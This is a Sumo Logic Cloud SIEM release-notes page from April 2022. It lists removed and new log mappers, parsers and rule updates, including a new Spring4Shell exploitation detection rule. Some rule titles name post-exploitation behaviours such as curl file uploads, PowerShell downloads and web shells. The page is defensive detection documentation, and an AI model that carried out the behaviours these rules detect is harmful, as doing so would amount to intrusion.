  • [Deleted] BIND_DHCP_FOR_FULL
  • [Deleted] BIND_DHCP_FOR_SHORT
  • [Deleted] BIND_DHCP_ON
  • [Deleted] BIND_Query
  • [Deleted] BIND_Update_Zone
  • [Deleted] BIND_Update_Zone_Failure
  • [Deleted] BIOC_CREATE_AND_WRITE
  • [Deleted] BIOC_CREDENTIAL_ACCESS
  • [Deleted] BIOC_DROPPER
  • [Deleted] BIOC_EVASION
  • [Deleted] BIOC_EVASION_VARIATION_2
  • [Deleted] BIOC_INFILTRATION
  • [Deleted] BIOC_PERSISTENCE_EXECUTION
  • [Deleted] BIOC_PRIVILEGE
  • [Deleted] BIOC_RECONNAISSANCE
  • [Deleted] BIOC_RECONNAISSANCE_VARIATION_2
  • [Deleted] BIOC_TAMPERING
  • [Deleted] BLUECAT_DHCP_BOOTREQUEST
  • [Deleted] BLUECAT_DHCP_DECLINE
  • [Deleted] BLUECAT_DHCP_INFORM
  • [Deleted] BLUECAT_DHCP_OFFER
  • [Deleted] BLUECAT_DHCP_failover
  • [Deleted] BLUECAT_DHCP_reuse_lease
  • [Deleted] BLUECAT_DNS_NO_KEY
  • [Deleted] BLUECAT_DNS_WITH_KEY
  • [Deleted] BLUECOAT_PROXY
  • [Deleted] BLUECOAT_PROXY_2
  • [Deleted] BLUECOAT_PROXY_4
  • [Deleted] BLUECOAT_PROXY_5
  • [Deleted] BLUECOAT_PROXY_6
  • [Deleted] BLUECOAT_PROXY_7
  • [Deleted] Bind_DNS_log_1
  • [Deleted] Bind_DNS_log_10
  • [Deleted] Bind_DNS_log_2
  • [Deleted] Bind_DNS_log_3
  • [Deleted] Bind_DNS_log_4
  • [Deleted] Bind_DNS_log_5
  • [Deleted] Bind_DNS_log_6
  • [Deleted] Bind_DNS_log_7
  • [Deleted] Bind_DNS_log_8
  • [Deleted] Bind_DNS_log_9
  • [Deleted] CB_PROTECT
  • [Deleted] CB_PROTECT_USERNAME
  • [Deleted] CB_RESPONSE_SERVER_1
  • [Deleted] CB_RESPONSE_SERVER_10
  • [Deleted] CB_RESPONSE_SERVER_11
  • [Deleted] CB_RESPONSE_SERVER_13
  • [Deleted] CB_RESPONSE_SERVER_14
  • [Deleted] CB_RESPONSE_SERVER_15
  • [Deleted] CB_RESPONSE_SERVER_17
  • [Deleted] CB_RESPONSE_SERVER_2
  • [Deleted] CB_RESPONSE_SERVER_20
  • [Deleted] CB_RESPONSE_SERVER_3
  • [Deleted] CB_RESPONSE_SERVER_4
  • [Deleted] CB_RESPONSE_SERVER_5
  • [Deleted] CB_RESPONSE_SERVER_6
  • [Deleted] CB_RESPONSE_SERVER_7
  • [Deleted] CB_RESPONSE_SERVER_9
  • [Deleted] CB_RESPONSE_SEVERITY_1
  • [Deleted] CB_RESPONSE_SEVERITY_2
  • [Deleted] CB_RESPONSE_SEVERITY_3
  • [Deleted] CHECKPOINT_ACCEPT
  • [Deleted] CHECKPOINT_CRYPT
  • [Deleted] CHECKPOINT_DROP
  • [Deleted] CHECKPOINT_KEY_INSTALL
  • [Deleted] CHECKPOINT_VPN_ROUTE
  • [Deleted] CICSCOFW434002
  • [Deleted] CISCOFW321001
  • [Deleted] CISCOFW419001
  • [Deleted] CISCO_ACS_FAILED_ATTEMPT
  • [Deleted] CISCO_ACS_FAILED_AUTHENTICATION
  • [Deleted] CISCO_ACS_PASSED_AUTHENTICATION
  • [Deleted] CISCO_ACS_TACACS_ACCOUNTING
  • [Deleted] CISCO_MERAKI_IDS_ALERTS
  • [Deleted] CISCO_MERAKI_SECURITY_EVENT
  • [Deleted] CISCO_MERAKI_SECURITY_EVENT_SECURITY_FILTERING_DISPOSITION_CHANGE
  • [Deleted] CRM_VODLOG
  • [Deleted] Cisco_Umbrella_IP_Logs
  • [Deleted] Dns_Update
  • [Deleted] EPO_THREATS_AV
  • [Deleted] EPO_THREAT_EVENT
  • [Deleted] EXABEAM
  • [Deleted] F5_HTTPD_AUDIT
  • [Deleted] F5_SSHD_SAMPLES
  • [Deleted] F5_SSL_REQUEST
  • [Deleted] FLOW_REASSEMBLE
  • [Deleted] FORCEPOINT_NEW_AND_IMPROVED
  • [Deleted] Failed_Logon
  • [Deleted] Firepower_ALERT_IDS
  • [Deleted] Firepower_Access_Control
  • [Deleted] Firepower_Access_Control_2
  • [Deleted] Firepower_Access_Control_3
  • [Deleted] Firepower_Access_Control_4
  • [Deleted] Firepower_Access_Control_5
  • [Deleted] IBM_WebSpheredatadevice_error_1
  • [Deleted] IBM_WebSpheredatadevice_error_2
  • [Deleted] IBM_WebSpheredatadevice_error_3
  • [Deleted] IBM_WebSpheredatadevice_error_4
  • [Deleted] IBM_WebSpheredatadevice_error_5
  • [Deleted] INFLOBLOX_DNS_MESSAGE
  • [Deleted] INFOBLOX_DHCPACK_RENEW_SAMPLES
  • [Deleted] INFOBLOX_DHCPDISCOVER_SAMPLES
  • [Deleted] INFOBLOX_DHCPDISCOVER_SAMPLES_2
  • [Deleted] INFOBLOX_DHCPDISCOVER_UNKNOWN_NETWORK_SAMPLE
  • [Deleted] INFOBLOX_DHCPEXPIRE_SAMPLES
  • [Deleted] INFOBLOX_DHCPNAK_SAMPLES
  • [Deleted] INFOBLOX_DHCPOFFER_UID_SAMPLES
  • [Deleted] INFOBLOX_DHCPRELEASE_SAMPLES
  • [Deleted] INFOBLOX_DHCP_UPDATER_1
  • [Deleted] INFOBLOX_DHCP_UPDATER_2
  • [Deleted] INFOBLOX_DHCP_UPDATER_3
  • [Deleted] INFOBLOX_DHCP_UPDATER_4
  • [Deleted] INFOBLOX_DHCP_UPDATER_5
  • [Deleted] INFOBLOX_DHCP_V2_SAMPLES
  • [Deleted] INFOBLOX_DNS_QUERIES
  • [Deleted] INFOBLOX_DNS_REQUEST_AXFR_ENDED
  • [Deleted] INFOBLOX_DNS_REQUEST_AXFR_STARTED
  • [Deleted] INFOBLOX_DNS_RESPONSE
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_1
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_2
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_3
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_4
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_5
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_6
  • [Deleted] INFOBLOX_DOMAIN_NOTIFIED
  • [Deleted] IRONPORT_QUARANTINE_MID
  • [Deleted] IRONPORT_QUARANTINE_TO
  • [Deleted] IRON_PORT_CONNECTION
  • [Deleted] IRON_PORT_DCID_MSG
  • [Deleted] IRON_PORT_DKIM
  • [Deleted] IRON_PORT_ICID_MSG
  • [Deleted] IRON_PORT_INFO_ICID
  • [Deleted] IRON_PORT_INFO_MID
  • [Deleted] IRON_PORT_INFO_MID_ICID
  • [Deleted] IRON_PORT_INFO_MSG
  • [Deleted] IRON_PORT_ISQ_RPC
  • [Deleted] IRON_PORT_WARN_FULL
  • [Deleted] IRON_PORT_WARN_INVALID_DNS_FULL
  • [Deleted] IRON_PORT_WARN_LIMIT
  • [Deleted] IRON_PORT_WARN_MSG
  • [Deleted] IRON_PORT_WSA
  • [Deleted] IRON_PORT_WSA_NOHD
  • [Deleted] IRON_PORT_WSA_NOHD_01
  • [Deleted] IRON_PORT_WSA_NOHD_03
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_1
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_2
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_3
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_4
  • [Deleted] Internal_Auth_Logs
  • [Deleted] LINUXSERVER_AUDIT_LOGS_1
  • [Deleted] LINUXSERVER_AUDIT_LOGS_2
  • [Deleted] LINUXSERVER_LOG_1
  • [Deleted] LINUXSERVER_LOG_11
  • [Deleted] LINUXSERVER_LOG_2
  • [Deleted] LINUXSERVER_LOG_3
  • [Deleted] LINUXSERVER_LOG_4
  • [Deleted] LINUXSERVER_LOG_5
  • [Deleted] LINUXSERVER_LOG_6
  • [Deleted] LINUXSERVER_LOG_7
  • [Deleted] LINUX_USER_AND_HOSTNAME
  • [Deleted] Linux_Laravel_Logs1
  • [Deleted] Linux_Laravel_Logs2
  • [Deleted] Linux_Laravel_Logs3
  • [Deleted] MVISION_CASB
  • [Deleted] NAT_RULES_MATCH
  • [Deleted] NMS_LOGS
  • [Deleted] NSM_THREAT_IPS
  • [Deleted] OAUTH_LOG
  • [Deleted] Ossec_Logs_01
  • [Deleted] Ossec_Logs_02
  • [Deleted] Ossec_Logs_03
  • [Deleted] Ossec_Logs_04
  • [Deleted] Ossec_Logs_06
  • [Deleted] PALO_ALTO_TRAPS
  • [Deleted] PALO_TRAPS_EXTRA
  • [Deleted] PAN_TRAPS_ANALYTICS
  • [Deleted] PAN_TRAPS_ANALYTICS_CLOUD
  • [Deleted] PAN_TRAPS_CONFIG_CLOUD
  • [Deleted] PAN_TRAPS_MISC_CLOUD
  • [Deleted] PAN_TRAPS_SYSTEM_CLOUD
  • [Deleted] PULSESECURE_LOGS
  • [Deleted] PULSESECURE_LOGS2
  • [Deleted] Renew_Logs
  • [Deleted] SESSION_ERROR
  • [Deleted] SHIBBOLETH_DUO
  • [Deleted] SHIBBOLETH_HTTP_EDU
  • [Deleted] SHIBBOLETH_HTTP_MAIL
  • [Deleted] SHIBBOLETH_LDAP
  • [Deleted] SHIBBOLETH_LDAP_EMAIL
  • [Deleted] SNARE_AGENTHEARTBEAT_LOGS
  • [Deleted] SNARE_WINDOWS_DHCP_LOGS
  • [Deleted] SNMP_LOGS
  • [Deleted] SURICATA_HTTP_LOGS
  • [Deleted] SURICATA_LOGSTASH
  • [Deleted] SURICATA_LOGSTASH_CUSTOM
  • [Deleted] SURICATA_THREAT_LOGS
  • [Deleted] SYMANTEC_SEP_Anti_Virus
  • [Deleted] SYMANTEC_SEP_PRF_01
  • [Deleted] SYMANTEC_SEP_PRF_02
  • [Deleted] SYMANTEC_SEP_PRF_03
  • [Deleted] SYMANTEC_SEP_SDN
  • [Deleted] SYMANTEC_SEP_SONAR
  • [Deleted] SYMANTEC_SEP_SRF
  • [Deleted] SYMANTEC_SEP_USB_1
  • [Deleted] SonicWall_Bad_FTP_Protocol
  • [Deleted] SonicWall_Block_Dropped_Events
  • [Deleted] SonicWall_Flood_Attack
  • [Deleted] SonicWall_IPS
  • [Deleted] SonicWall_Port_Scan
  • [Deleted] SonicWall_URL_Filter
  • [Deleted] Successful_Logon
  • [Deleted] TANIUM_S24_TYPE_LOGS
  • [Deleted] VAR_LOG_SECURE_SUCCESSFUL_LOGIN
  • [Deleted] VDM_LOG_EXTRA
  • [Deleted] VDM_MESSAGES_CONNECT
  • [Deleted] VDM_MESSAGES_DIRECTORY
  • [Deleted] VDM_MESSAGES_FROM
  • [Deleted] VDM_MESSAGES_FTP
  • [Deleted] VDM_MESSAGES_WARN
  • [Deleted] VLT_VAULT_EXTRA
  • [Deleted] VPN_Message_2
  • [Deleted] VPN_Message_3
  • [Deleted] VPN_Message_4
  • [Deleted] VPN_Message_5
  • [Deleted] VPN_Messages
  • [Deleted] Vmware_Logs_1
  • [Deleted] Vmware_Logs_2
  • [Deleted] Vmware_Logs_3
  • [Deleted] Vmware_Logs_4
  • [Deleted] Vmware_Logs_5
  • [Deleted] Vmware_Logs_6
  • [Deleted] Vmware_Logs_7
  • [Deleted] Vmware_Logs_8
  • [Deleted] WATCHGUARD_FLOW_LOG
  • [Deleted] WATCHGUARD_FLOW_LOG_2
  • [Deleted] WINDOWS_DHCP_LOG
  • [Deleted] WINDOWS_QUICK_FIX
  • [Deleted] Zscaler_Firewall
  • [Deleted] cisco_authentication_01
  • [Deleted] cisco_authentication_02
  • [Deleted] cisco_authentication_03
  • [Deleted] cisco_authentication_04
  • [Deleted] cisco_authentication_05
  • [Deleted] cisco_authentication_06
  • [Deleted] cisco_authentication_07
  • [Deleted] cisco_authentication_08
  • [Deleted] cisco_authentication_09
  • [Deleted] cisco_authentication_10
  • [Deleted] cisco_authentication_11
  • [Deleted] cisco_authentication_12
  • [Deleted] cisco_authentication_13
  • [Deleted] cisco_authentication_14
  • [Deleted] cisco_authentication_15
  • [Deleted] cisco_ios_system_log_message
  • [Deleted] cisco_ios_system_log_message_queue_full
  • [Deleted] citrix_netscaler_AAA_Messsage
  • [Deleted] citrix_netscaler_API_CMD_EXECUTED
  • [Deleted] citrix_netscaler_TCP_connection_terminated
  • [Deleted] citrix_netscaler_delinked_message
  • [Deleted] citrix_netscaler_delinked_message_01
  • [Deleted] windows_defender

Schema

  • [New] _cipSourceHost
  • [New] _cipSourceName

April 7, 2022 - Announcement

On April 21, 2022 we will be removing the following legacy log mappers related to the CIP Windows collector from the Cloud SIEM platform. These log mappers are in use with only a small portion of our customer base and we are working with our technical account teams to reach out directly to those impacted and migrate to our newer Sumo parsers.

No loss of out-of-the-box functionality will occur and no out-of-the-box rules are impacted as the Sumo parsers map all of the same information. Please be sure to check any custom rules that leverage Windows logging for compatibility with the new parsing and mapping, particularly where the "fields" field is referenced.

  • Windows - Security - 1100 - CIP
  • Windows - Security - 1102 - CIP
  • Windows - Security - 4625 - CIP
  • Windows - Security - 4624 - CIP
  • Windows - Security - 4634 - CIP
  • Windows - Security - 4648 - CIP
  • Windows - Security - 4649 - CIP
  • Windows - Security - 4672 - CIP
  • Windows - Security - 4688 - CIP
  • Windows - Security - 4697 - CIP
  • Windows - Security - 4698 - CIP
  • Windows - Security - 4702 - CIP
  • Windows - Security - 4720 - CIP
  • Windows - Security - 4726 - CIP
  • Windows - Security - 4740 - CIP
  • Windows - Security - 4742 - CIP
  • Windows - Security - 5805 - CIP
  • Windows - Security - 4768 - CIP
  • Windows - Security - 4769 - CIP
  • Windows - Security - 4770 - CIP
  • Windows - Security - 4771 - CIP
  • Windows - Security - 4776 - CIP
  • Windows - Security - 4778 - CIP
  • Windows - Security - 4779 - CIP
  • Windows - Security - 5140 - CIP
  • Windows - Security - 4728 - CIP
  • Windows - Security - 4732 - CIP
  • Windows - Security - 4756 - CIP
  • Windows - Security - 4661 - CIP
  • Windows - Security - 4704 - CIP
  • Windows - Security - 4754 - CIP
  • Windows - Security - 4780 - CIP
  • Windows - Security - 4793 - CIP
  • Windows - Security - 5038 - CIP
  • Windows - Security - 6272 - CIP
  • Windows - Security - 6273 - CIP
  • Windows - Security - 6275 - CIP
  • Windows - Security - 6278 - CIP
  • Windows - Security - 4662 - CIP
  • Windows - Security - 4755 - CIP
  • Windows - Security - 4689 - CIP
  • Windows - Security - 4798 - CIP
  • Windows - Security - 6416 - CIP
  • Windows - Security - 6423 - CIP
  • Windows - Security - 6424 - CIP
  • Windows - Security - 4656 - CIP
  • Windows - Security - 4663 - CIP
  • Windows - Security - 4658 - CIP
  • Windows - Security - 4674 - CIP
  • Windows - Security - 4799 - CIP
  • Windows - Security - 5058 - CIP
  • Windows - Security - 5059 - CIP
  • Windows - Security - 5061 - CIP
  • Windows - Security - 5379 - CIP
  • Windows - System - 5138 - CIP
  • Windows - System - 6005 - CIP
  • Windows - System - 6006 - CIP
  • Windows - System - 7045 - CIP
  • Windows - Microsoft-Windows-PowerShell/Operational - 4103 - CIP
  • Windows - Microsoft-Windows-PowerShell/Operational - 4104 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 1 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 2 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 3 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 4 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 5 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 6 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 8 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 10 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 11 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 15 - CIP

April 7, 2022 - Content Release

Rules

  • [Updated] MATCH-S00599 Alibaba ActionTrail Root Login
  • [Updated] MATCH-S00476 Suspicious Execution of Search Indexer
  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process
  • [Updated] MATCH-S00168 Windows - Local System executing whoami.exe

Log Mappers

  • [New] Cisco ASA 313004 JSON
  • [New] Linux OS Syslog - Process kernel - Promiscuous Mode Change
  • [Updated] AzureActivityLog 01
  • [Updated] AzureActivityLog AuditLogs

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/SentinelOne/SentinelOne Syslog

April 6, 2022 - Announcement

Upcoming Removal of Unused Content

On Tuesday, April 12th, **unused **legacy grok parsers and their corresponding log mappers will be removed from Cloud SIEM.

This update is part of a longer transition as we begin decommissioning legacy grok parsers in favor of our current parser set. Sumo Logic has confirmed customers are **NOT **actively using any of the legacy grok parsers or log mappers we plan to remove in this future update.

It's important to note that this future content update does **NOT **remove or change existing legacy grok parsers or associated log mappers still used by customers today. We do not expect this update to cause any operational changes.


April 1, 2022 - Content Release

Spring4Shell Exploitation

A new Rule is being deployed designed to detect attempts to exploit Spring4Shell (MATCH-S00783). This Rule does not necessarily indicate whether the exploitation was successful, but Cloud SIEM already includes a number of Rules that provide extensive coverage of common post exploitation activities, notably:

  • MATCH-S00348 Curl Start Combination
  • MATCH-S00362 Suspicious Curl File Upload
  • LEGACY-S00044 HTTP Shell Script Download Disguised as a Common Web File
  • MATCH-S00149 PowerShell File Download
  • MATCH-S00164 Suspicious Shells Spawned by Web Servers
  • MATCH-S00174 Web Services Executing Common Web Shell Commands

Rules

  • [New] MATCH-S00783 Spring4Shell Exploitation - URL
  • [Updated] MATCH-S00555 Threat Intel - Inbound Traffic Context

Log Mappers

  • [New] Netskope - WebTx Events
  • [New] Tenable.io Authentication
  • [New] Tenable.io Catch All
  • [Updated] AWS CloudFront
  • [Updated] AWS WAF Block Logs
  • [Updated] Microsoft Office 365 Active Directory Authentication Events
  • [Updated] Tenable.io Vulnerability
Legal
Privacy Statement
Terms of Use

Copyright © 2024 by Sumo Logic, Inc.